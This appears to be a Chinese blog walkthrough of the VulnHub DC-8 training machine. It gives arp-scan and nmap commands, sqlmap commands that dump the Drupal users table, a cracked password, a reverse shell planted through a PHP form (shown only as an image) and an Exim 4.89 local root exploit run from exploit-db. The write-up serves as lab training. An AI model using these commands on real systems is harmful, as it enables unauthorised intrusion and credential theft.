简介
![](https://i-blog.csdnimg.cn/blog_migrate/71fa3c5dbfd0a7528ed6690b153cb63d.png)
下载
- DC-8.zip (Size: 379 MB)
- Download: http://www.five86.com/downloads/DC-8.zip
- Download (Mirror): https://download.vulnhub.com/dc/DC-8.zip
- Download (Torrent): https://download.vulnhub.com/dc/DC-8.zip.torrent ( Magnet)
信息收集
主机探活
kali中使用arp-scan进行主机探活
arp-scan --interface eth0 192.168.0.0/24
![](https://i-blog.csdnimg.cn/blog_migrate/822ab054858e13da46e316d62c9dbf21.png)
经过筛选可以知道192.168.0.154是DC-8的ip
端口扫描
nmap -sC -sV -p- 192.168.0.154
![](https://i-blog.csdnimg.cn/blog_migrate/8bce896e2772c2c3b52f517f8a1f2cac.png)
发现这里开了80、22端口
首先从80端口入手
![](https://i-blog.csdnimg.cn/blog_migrate/68bcd686983f61d9568032144a8a00e1.png)
这里还是一样的用的Drupal的CMS
这一题的入口点在主页的Details中
![](https://i-blog.csdnimg.cn/blog_migrate/1cacbda305ccffd04e7c1501bacf6440.png)
点击之后能在url中发现是用id形式的显示,这里能够猜测应该存在SQL注入
sqlmap一把梭
#爆库
sqlmap -u "http://192.168.0.154/?nid=1" --dbs --batch
#爆表名
sqlmap -u "http://192.168.0.154/?nid=1" -D d7db --tables --batch
#爆列名
sqlmap -u "http://192.168.0.154/?nid=1" -D d7db -T users --columns --batch
#爆数据
sqlmap -u "http://192.168.0.154/?nid=1" -D d7db -T users -C name,pass --dump --batch
![](https://i-blog.csdnimg.cn/blog_migrate/8704475bbe68025f85cc96a63a747d25.png)
得到admin和John两个用户,密码是MD5加密的
John这个用户名就很有意思,这也就是提示我们用John爆出这个密码
然后admin的密码爆不出来
john的密码是turtle
登录地址可以路径爆破出来
![](https://i-blog.csdnimg.cn/blog_migrate/8457767432c38517146599e9c734b485.png)
渗透
然后用john/turtle登录成功
![](https://i-blog.csdnimg.cn/blog_migrate/4d3626d82ffd4b87bbe72e7652bd1ac5.png)
然后的任务就是找到可以上传php代码的地方
![](https://i-blog.csdnimg.cn/blog_migrate/87565c20209c56b16fba7c8ae39994ee.png)
最后是在这里找到的
写入反弹shell代码并保存
![](https://i-blog.csdnimg.cn/blog_migrate/ee57cce271674b4a8267bd8eca6302bd.png)
然后在反馈
页面填写信息提交,反弹shell就成功了
![](https://i-blog.csdnimg.cn/blog_migrate/55f718422b3c0954fd0dbdb2f49761dd.png)
提权
切换shell
python -c "import pty;pty.spawn('/bin/bash')"
看看有没有内核提权
uname -a
![](https://i-blog.csdnimg.cn/blog_migrate/aa2068dcfd37439aa9757888abc1fcdd.png)
查看具有root权限的命令
find / -perm -u=s -type f 2>/dev/null
![](https://i-blog.csdnimg.cn/blog_migrate/4f9e9a1f04755eae5a6fd34e32692862.png)
发现了exim4,查看版本
![](https://i-blog.csdnimg.cn/blog_migrate/998d6c074a202800a8c909059c7bcf96.png)
版本4.89,查看是否存在漏洞
![](https://i-blog.csdnimg.cn/blog_migrate/ba44389e67686593f7b88eaa22027d28.png)
将exp复制出来
cp /usr/share/exploitdb/exploits/linux/local/46996.sh .
修改exp脚本执行编码
:set ff=unix
python开启http服务
python3 -m http.server 80
靶机切换到tmp目录下,下载文件
![](https://i-blog.csdnimg.cn/blog_migrate/b668946cd8a33b1d61c2558223330200.png)
赋予权限
chmod +x 46996.sh
执行
./46996.sh -m netcat
![](https://i-blog.csdnimg.cn/blog_migrate/0f69bc272c1f8c37bd5f53ba7f52b75c.png)
提权成功
查看flag
![](https://i-blog.csdnimg.cn/blog_migrate/addabc5c0015ac349530a68c81bba094.png)